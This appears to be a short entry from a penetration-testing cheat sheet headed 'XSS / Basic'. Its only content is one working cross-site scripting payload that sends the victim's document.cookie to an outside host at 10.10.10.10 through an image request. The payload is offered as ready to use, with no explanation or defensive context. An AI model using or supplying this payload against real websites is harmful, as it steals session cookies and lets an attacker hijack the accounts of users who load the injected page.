XSS

Basic

<script>var i=new Image;i.src="http://10.10.10.10/?"+document.cookie;</script>

Last updated